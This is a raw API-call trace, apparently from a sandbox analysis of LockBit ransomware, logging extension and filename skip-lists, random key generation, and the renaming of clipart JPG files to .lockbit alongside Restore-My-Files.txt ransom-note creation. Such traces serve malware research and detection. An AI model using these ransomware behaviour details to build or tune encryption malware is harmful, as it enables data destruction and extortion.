lstrcmpiW (lpString1=".ics", lpString2=".JPG") returned -1 [0159.062] lstrcmpiW (lpString1=".key", lpString2=".JPG") returned 1 [0159.062] lstrcmpiW (lpString1=".mp3", lpString2=".JPG") returned 1 [0159.062] lstrcmpiW (lpString1=".reg", lpString2=".JPG") returned 1 [0159.062] lstrcmpiW (lpString1=".dll", lpString2=".JPG") returned -1 [0159.062] lstrcmpiW (lpString1=".ini", lpString2=".JPG") returned -1 [0159.062] lstrcmpiW (lpString1=".idx", lpString2=".JPG") returned -1 [0159.062] lstrcmpiW (lpString1=".sys", lpString2=".JPG") returned 1 [0159.062] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0159.062] lstrcmpiW (lpString1=".ico", lpString2=".JPG") returned -1 [0159.062] lstrcmpiW (lpString1=".lnk", lpString2=".JPG") returned 1 [0159.062] lstrcmpiW (lpString1=".rdp", lpString2=".JPG") returned 1 [0159.062] lstrcmpiW (lpString1=".lockbit", lpString2=".JPG") returned 1 [0159.062] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0341551.JPG") returned 1 [0159.062] lstrcmpiW (lpString1="ntldr", lpString2="J0341551.JPG") returned 1 [0159.062] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0341551.JPG") returned 1 [0159.062] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0341551.JPG") returned -1 [0159.062] lstrcmpiW (lpString1="autorun.inf", lpString2="J0341551.JPG") returned -1 [0159.062] lstrcmpiW (lpString1="thumbs.db", lpString2="J0341551.JPG") returned 1 [0159.062] lstrcmpiW (lpString1="iconcache.db", lpString2="J0341551.JPG") returned -1 [0159.062] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0159.062] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0341551.JPG") returned=".JPG" [0159.063] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0159.063] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0159.063] lstrcmpiW (lpString1=".7z", lpString2=".JPG") returned -1 [0159.063] lstrcmpiW (lpString1=".ckp", lpString2=".JPG") returned -1 [0159.063] lstrcmpiW (lpString1=".dacpac", lpString2=".JPG") returned -1 [0159.063] lstrcmpiW (lpString1=".db", lpString2=".JPG") returned -1 [0159.063] lstrcmpiW (lpString1=".db-shm", lpString2=".JPG") returned -1 [0159.063] lstrcmpiW (lpString1=".db-wal", lpString2=".JPG") returned -1 [0159.063] lstrcmpiW (lpString1=".db3", lpString2=".JPG") returned -1 [0159.063] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0159.063] lstrcmpiW (lpString1=".dbc", lpString2=".JPG") returned -1 [0159.063] lstrcmpiW (lpString1=".dbs", lpString2=".JPG") returned -1 [0159.063] lstrcmpiW (lpString1=".dbt", lpString2=".JPG") returned -1 [0159.063] lstrcmpiW (lpString1=".dbv", lpString2=".JPG") returned -1 [0159.063] lstrcmpiW (lpString1=".frm", lpString2=".JPG") returned -1 [0159.063] lstrcmpiW (lpString1=".mdf", lpString2=".JPG") returned 1 [0159.063] lstrcmpiW (lpString1=".mrg", lpString2=".JPG") returned 1 [0159.063] lstrcmpiW (lpString1=".mwb", lpString2=".JPG") returned 1 [0159.063] lstrcmpiW (lpString1=".myd", lpString2=".JPG") returned 1 [0159.063] lstrcmpiW (lpString1=".ndf", lpString2=".JPG") returned 1 [0159.063] lstrcmpiW (lpString1=".qry", lpString2=".JPG") returned 1 [0159.064] lstrcmpiW (lpString1=".sdb", lpString2=".JPG") returned 1 [0159.064] lstrcmpiW (lpString1=".sdf", lpString2=".JPG") returned 1 [0159.064] lstrcmpiW (lpString1=".sql", lpString2=".JPG") returned 1 [0159.064] lstrcmpiW (lpString1=".sqlite", lpString2=".JPG") returned 1 [0159.064] lstrcmpiW (lpString1=".sqlite3", lpString2=".JPG") returned 1 [0159.064] lstrcmpiW (lpString1=".sqlitedb", lpString2=".JPG") returned 1 [0159.064] lstrcmpiW (lpString1=".tmd", lpString2=".JPG") returned 1 [0159.064] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0341551.JPG.lockbit") returned 72 [0159.064] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0341551.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0341551.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x338 [0159.065] CreateIoCompletionPort (FileHandle=0x338, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0159.065] malloc (_Size=0x40068) returned 0x3e70008 [0159.065] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x3e70020 | out: lpFileSize=0x3e70020*=23126) returned 1 [0159.065] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0159.066] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0159.066] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb003c) returned 0x0 [0159.066] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0159.067] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0159.067] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb004c) returned 0x0 [0159.067] ReadFile (in: hFile=0x338, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0159.073] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0341551.JPG.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0341551.JPG.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0159.073] malloc (_Size=0xa6) returned 0x1fa2ed8 [0159.073] NtSetInformationFile (FileHandle=0x338, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0159.075] free (_Block=0x1fa2ed8) [0159.075] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0341551.JPG" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0159.075] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0159.075] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0159.075] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78964d00, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x56772310, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x78964d00, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x6f43, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0341554.JPG", cAlternateFileName="")) returned 1 [0159.075] lstrcmpiW (lpString1=".", lpString2="J0341554.JPG") returned -1 [0159.075] lstrcmpiW (lpString1="..", lpString2="J0341554.JPG") returned -1 [0159.075] PathFindExtensionW (pszPath="J0341554.JPG") returned=".JPG" [0159.075] lstrcmpiW (lpString1=".386", lpString2=".JPG") returned -1 [0159.075] lstrcmpiW (lpString1=".cmd", lpString2=".JPG") returned -1 [0159.075] lstrcmpiW (lpString1=".exe", lpString2=".JPG") returned -1 [0159.075] lstrcmpiW (lpString1=".ani", lpString2=".JPG") returned -1 [0159.076] lstrcmpiW (lpString1=".adv", lpString2=".JPG") returned -1 [0159.076] lstrcmpiW (lpString1=".theme", lpString2=".JPG") returned 1 [0159.076] lstrcmpiW (lpString1=".msi", lpString2=".JPG") returned 1 [0159.076] lstrcmpiW (lpString1=".msp", lpString2=".JPG") returned 1 [0159.076] lstrcmpiW (lpString1=".com", lpString2=".JPG") returned -1 [0159.076] lstrcmpiW (lpString1=".diagpkg", lpString2=".JPG") returned -1 [0159.076] lstrcmpiW (lpString1=".nls", lpString2=".JPG") returned 1 [0159.076] lstrcmpiW (lpString1=".diagcab", lpString2=".JPG") returned -1 [0159.076] lstrcmpiW (lpString1=".lock", lpString2=".JPG") returned 1 [0159.076] lstrcmpiW (lpString1=".ocx", lpString2=".JPG") returned 1 [0159.076] lstrcmpiW (lpString1=".mpa", lpString2=".JPG") returned 1 [0159.076] lstrcmpiW (lpString1=".cpl", lpString2=".JPG") returned -1 [0159.076] lstrcmpiW (lpString1=".mod", lpString2=".JPG") returned 1 [0159.076] lstrcmpiW (lpString1=".hta", lpString2=".JPG") returned -1 [0159.076] lstrcmpiW (lpString1=".icns", lpString2=".JPG") returned -1 [0159.076] lstrcmpiW (lpString1=".prf", lpString2=".JPG") returned 1 [0159.076] lstrcmpiW (lpString1=".rtp", lpString2=".JPG") returned 1 [0159.076] lstrcmpiW (lpString1=".diagcfg", lpString2=".JPG") returned -1 [0159.076] lstrcmpiW (lpString1=".msstyles", lpString2=".JPG") returned 1 [0159.076] lstrcmpiW (lpString1=".bin", lpString2=".JPG") returned -1 [0159.076] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0159.076] lstrcmpiW (lpString1=".shs", lpString2=".JPG") returned 1 [0159.076] lstrcmpiW (lpString1=".drv", lpString2=".JPG") returned -1 [0159.077] lstrcmpiW (lpString1=".wpx", lpString2=".JPG") returned 1 [0159.077] lstrcmpiW (lpString1=".bat", lpString2=".JPG") returned -1 [0159.077] lstrcmpiW (lpString1=".rom", lpString2=".JPG") returned 1 [0159.077] lstrcmpiW (lpString1=".msc", lpString2=".JPG") returned 1 [0159.077] lstrcmpiW (lpString1=".spl", lpString2=".JPG") returned 1 [0159.077] lstrcmpiW (lpString1=".ps1", lpString2=".JPG") returned 1 [0159.077] lstrcmpiW (lpString1=".msu", lpString2=".JPG") returned 1 [0159.077] lstrcmpiW (lpString1=".ics", lpString2=".JPG") returned -1 [0159.077] lstrcmpiW (lpString1=".key", lpString2=".JPG") returned 1 [0159.077] lstrcmpiW (lpString1=".mp3", lpString2=".JPG") returned 1 [0159.077] lstrcmpiW (lpString1=".reg", lpString2=".JPG") returned 1 [0159.077] lstrcmpiW (lpString1=".dll", lpString2=".JPG") returned -1 [0159.077] lstrcmpiW (lpString1=".ini", lpString2=".JPG") returned -1 [0159.077] lstrcmpiW (lpString1=".idx", lpString2=".JPG") returned -1 [0159.077] lstrcmpiW (lpString1=".sys", lpString2=".JPG") returned 1 [0159.077] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0159.077] lstrcmpiW (lpString1=".ico", lpString2=".JPG") returned -1 [0159.077] lstrcmpiW (lpString1=".lnk", lpString2=".JPG") returned 1 [0159.077] lstrcmpiW (lpString1=".rdp", lpString2=".JPG") returned 1 [0159.077] lstrcmpiW (lpString1=".lockbit", lpString2=".JPG") returned 1 [0159.077] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0341554.JPG") returned 1 [0159.077] lstrcmpiW (lpString1="ntldr", lpString2="J0341554.JPG") returned 1 [0159.078] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0341554.JPG") returned 1 [0159.078] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0341554.JPG") returned -1 [0159.078] lstrcmpiW (lpString1="autorun.inf", lpString2="J0341554.JPG") returned -1 [0159.078] lstrcmpiW (lpString1="thumbs.db", lpString2="J0341554.JPG") returned 1 [0159.078] lstrcmpiW (lpString1="iconcache.db", lpString2="J0341554.JPG") returned -1 [0159.078] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0159.078] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0341554.JPG") returned=".JPG" [0159.078] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0159.078] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0159.078] lstrcmpiW (lpString1=".7z", lpString2=".JPG") returned -1 [0159.078] lstrcmpiW (lpString1=".ckp", lpString2=".JPG") returned -1 [0159.078] lstrcmpiW (lpString1=".dacpac", lpString2=".JPG") returned -1 [0159.078] lstrcmpiW (lpString1=".db", lpString2=".JPG") returned -1 [0159.078] lstrcmpiW (lpString1=".db-shm", lpString2=".JPG") returned -1 [0159.078] lstrcmpiW (lpString1=".db-wal", lpString2=".JPG") returned -1 [0159.078] lstrcmpiW (lpString1=".db3", lpString2=".JPG") returned -1 [0159.078] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0159.078] lstrcmpiW (lpString1=".dbc", lpString2=".JPG") returned -1 [0159.078] lstrcmpiW (lpString1=".dbs", lpString2=".JPG") returned -1 [0159.078] lstrcmpiW (lpString1=".dbt", lpString2=".JPG") returned -1 [0159.078] lstrcmpiW (lpString1=".dbv", lpString2=".JPG") returned -1 [0159.078] lstrcmpiW (lpString1=".frm", lpString2=".JPG") returned -1 [0159.079] lstrcmpiW (lpString1=".mdf", lpString2=".JPG") returned 1 [0159.079] lstrcmpiW (lpString1=".mrg", lpString2=".JPG") returned 1 [0159.079] lstrcmpiW (lpString1=".mwb", lpString2=".JPG") returned 1 [0159.079] lstrcmpiW (lpString1=".myd", lpString2=".JPG") returned 1 [0159.079] lstrcmpiW (lpString1=".ndf", lpString2=".JPG") returned 1 [0159.079] lstrcmpiW (lpString1=".qry", lpString2=".JPG") returned 1 [0159.079] lstrcmpiW (lpString1=".sdb", lpString2=".JPG") returned 1 [0159.079] lstrcmpiW (lpString1=".sdf", lpString2=".JPG") returned 1 [0159.079] lstrcmpiW (lpString1=".sql", lpString2=".JPG") returned 1 [0159.079] lstrcmpiW (lpString1=".sqlite", lpString2=".JPG") returned 1 [0159.079] lstrcmpiW (lpString1=".sqlite3", lpString2=".JPG") returned 1 [0159.079] lstrcmpiW (lpString1=".sqlitedb", lpString2=".JPG") returned 1 [0159.079] lstrcmpiW (lpString1=".tmd", lpString2=".JPG") returned 1 [0159.079] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0341554.JPG.lockbit") returned 72 [0159.079] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0341554.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0341554.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0159.086] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0159.086] malloc (_Size=0x40068) returned 0x1ff1e60 [0159.086] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=28483) returned 1 [0159.086] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0159.086] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0159.086] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0159.086] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0159.087] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0159.087] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0159.087] ReadFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0159.090] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0341554.JPG.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0341554.JPG.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0159.090] malloc (_Size=0xa6) returned 0x1fa2ed8 [0159.090] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0159.092] free (_Block=0x1fa2ed8) [0159.092] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0341554.JPG" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0159.092] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0159.092] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0159.092] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78964d00, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x56772310, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x78964d00, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x6aa8, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0341557.JPG", cAlternateFileName="")) returned 1 [0159.092] lstrcmpiW (lpString1=".", lpString2="J0341557.JPG") returned -1 [0159.092] lstrcmpiW (lpString1="..", lpString2="J0341557.JPG") returned -1 [0159.092] PathFindExtensionW (pszPath="J0341557.JPG") returned=".JPG" [0159.092] lstrcmpiW (lpString1=".386", lpString2=".JPG") returned -1 [0159.092] lstrcmpiW (lpString1=".cmd", lpString2=".JPG") returned -1 [0159.092] lstrcmpiW (lpString1=".exe", lpString2=".JPG") returned -1 [0159.092] lstrcmpiW (lpString1=".ani", lpString2=".JPG") returned -1 [0159.093] lstrcmpiW (lpString1=".adv", lpString2=".JPG") returned -1 [0159.093] lstrcmpiW (lpString1=".theme", lpString2=".JPG") returned 1 [0159.093] lstrcmpiW (lpString1=".msi", lpString2=".JPG") returned 1 [0159.093] lstrcmpiW (lpString1=".msp", lpString2=".JPG") returned 1 [0159.093] lstrcmpiW (lpString1=".com", lpString2=".JPG") returned -1 [0159.093] lstrcmpiW (lpString1=".diagpkg", lpString2=".JPG") returned -1 [0159.093] lstrcmpiW (lpString1=".nls", lpString2=".JPG") returned 1 [0159.093] lstrcmpiW (lpString1=".diagcab", lpString2=".JPG") returned -1 [0159.093] lstrcmpiW (lpString1=".lock", lpString2=".JPG") returned 1 [0159.093] lstrcmpiW (lpString1=".ocx", lpString2=".JPG") returned 1 [0159.093] lstrcmpiW (lpString1=".mpa", lpString2=".JPG") returned 1 [0159.093] lstrcmpiW (lpString1=".cpl", lpString2=".JPG") returned -1 [0159.093] lstrcmpiW (lpString1=".mod", lpString2=".JPG") returned 1 [0159.093] lstrcmpiW (lpString1=".hta", lpString2=".JPG") returned -1 [0159.093] lstrcmpiW (lpString1=".icns", lpString2=".JPG") returned -1 [0159.093] lstrcmpiW (lpString1=".prf", lpString2=".JPG") returned 1 [0159.093] lstrcmpiW (lpString1=".rtp", lpString2=".JPG") returned 1 [0159.094] lstrcmpiW (lpString1=".diagcfg", lpString2=".JPG") returned -1 [0159.094] lstrcmpiW (lpString1=".msstyles", lpString2=".JPG") returned 1 [0159.094] lstrcmpiW (lpString1=".bin", lpString2=".JPG") returned -1 [0159.094] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0159.094] lstrcmpiW (lpString1=".shs", lpString2=".JPG") returned 1 [0159.094] lstrcmpiW (lpString1=".drv", lpString2=".JPG") returned -1 [0159.094] lstrcmpiW (lpString1=".wpx", lpString2=".JPG") returned 1 [0159.094] lstrcmpiW (lpString1=".bat", lpString2=".JPG") returned -1 [0159.094] lstrcmpiW (lpString1=".rom", lpString2=".JPG") returned 1 [0159.094] lstrcmpiW (lpString1=".msc", lpString2=".JPG") returned 1 [0159.094] lstrcmpiW (lpString1=".spl", lpString2=".JPG") returned 1 [0159.094] lstrcmpiW (lpString1=".ps1", lpString2=".JPG") returned 1 [0159.094] lstrcmpiW (lpString1=".msu", lpString2=".JPG") returned 1 [0159.094] lstrcmpiW (lpString1=".ics", lpString2=".JPG") returned -1 [0159.094] lstrcmpiW (lpString1=".key", lpString2=".JPG") returned 1 [0159.094] lstrcmpiW (lpString1=".mp3", lpString2=".JPG") returned 1 [0159.094] lstrcmpiW (lpString1=".reg", lpString2=".JPG") returned 1 [0159.094] lstrcmpiW (lpString1=".dll", lpString2=".JPG") returned -1 [0159.094] lstrcmpiW (lpString1=".ini", lpString2=".JPG") returned -1 [0159.094] lstrcmpiW (lpString1=".idx", lpString2=".JPG") returned -1 [0159.095] lstrcmpiW (lpString1=".sys", lpString2=".JPG") returned 1 [0159.095] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0159.095] lstrcmpiW (lpString1=".ico", lpString2=".JPG") returned -1 [0159.095] lstrcmpiW (lpString1=".lnk", lpString2=".JPG") returned 1 [0159.095] lstrcmpiW (lpString1=".rdp", lpString2=".JPG") returned 1 [0159.095] lstrcmpiW (lpString1=".lockbit", lpString2=".JPG") returned 1 [0159.095] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0341557.JPG") returned 1 [0159.095] lstrcmpiW (lpString1="ntldr", lpString2="J0341557.JPG") returned 1 [0159.095] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0341557.JPG") returned 1 [0159.095] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0341557.JPG") returned -1 [0159.095] lstrcmpiW (lpString1="autorun.inf", lpString2="J0341557.JPG") returned -1 [0159.095] lstrcmpiW (lpString1="thumbs.db", lpString2="J0341557.JPG") returned 1 [0159.095] lstrcmpiW (lpString1="iconcache.db", lpString2="J0341557.JPG") returned -1 [0159.095] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0159.095] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0341557.JPG") returned=".JPG" [0159.095] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0159.096] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0159.096] lstrcmpiW (lpString1=".7z", lpString2=".JPG") returned -1 [0159.096] lstrcmpiW (lpString1=".ckp", lpString2=".JPG") returned -1 [0159.096] lstrcmpiW (lpString1=".dacpac", lpString2=".JPG") returned -1 [0159.096] lstrcmpiW (lpString1=".db", lpString2=".JPG") returned -1 [0159.096] lstrcmpiW (lpString1=".db-shm", lpString2=".JPG") returned -1 [0159.096] lstrcmpiW (lpString1=".db-wal", lpString2=".JPG") returned -1 [0159.096] lstrcmpiW (lpString1=".db3", lpString2=".JPG") returned -1 [0159.096] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0159.096] lstrcmpiW (lpString1=".dbc", lpString2=".JPG") returned -1 [0159.096] lstrcmpiW (lpString1=".dbs", lpString2=".JPG") returned -1 [0159.096] lstrcmpiW (lpString1=".dbt", lpString2=".JPG") returned -1 [0159.096] lstrcmpiW (lpString1=".dbv", lpString2=".JPG") returned -1 [0159.096] lstrcmpiW (lpString1=".frm", lpString2=".JPG") returned -1 [0159.096] lstrcmpiW (lpString1=".mdf", lpString2=".JPG") returned 1 [0159.096] lstrcmpiW (lpString1=".mrg", lpString2=".JPG") returned 1 [0159.096] lstrcmpiW (lpString1=".mwb", lpString2=".JPG") returned 1 [0159.096] lstrcmpiW (lpString1=".myd", lpString2=".JPG") returned 1 [0159.096] lstrcmpiW (lpString1=".ndf", lpString2=".JPG") returned 1 [0159.096] lstrcmpiW (lpString1=".qry", lpString2=".JPG") returned 1 [0159.097] lstrcmpiW (lpString1=".sdb", lpString2=".JPG") returned 1 [0159.097] lstrcmpiW (lpString1=".sdf", lpString2=".JPG") returned 1 [0159.097] lstrcmpiW (lpString1=".sql", lpString2=".JPG") returned 1 [0159.097] lstrcmpiW (lpString1=".sqlite", lpString2=".JPG") returned 1 [0159.097] lstrcmpiW (lpString1=".sqlite3", lpString2=".JPG") returned 1 [0159.097] lstrcmpiW (lpString1=".sqlitedb", lpString2=".JPG") returned 1 [0159.097] lstrcmpiW (lpString1=".tmd", lpString2=".JPG") returned 1 [0159.097] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0341557.JPG.lockbit") returned 72 [0159.097] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0341557.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0341557.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0159.098] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0159.098] malloc (_Size=0x40068) returned 0x3d70450 [0159.098] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=27304) returned 1 [0159.098] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0159.099] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0159.099] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0159.099] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0159.100] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0159.100] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0159.100] ReadFile (in: hFile=0x308, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0159.105] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0341557.JPG.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0341557.JPG.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0159.105] malloc (_Size=0xa6) returned 0x1fa2ed8 [0159.105] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0159.106] free (_Block=0x1fa2ed8) [0159.106] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0341557.JPG" | out: pszPath="C:\\\\Program Files\\Microsoft 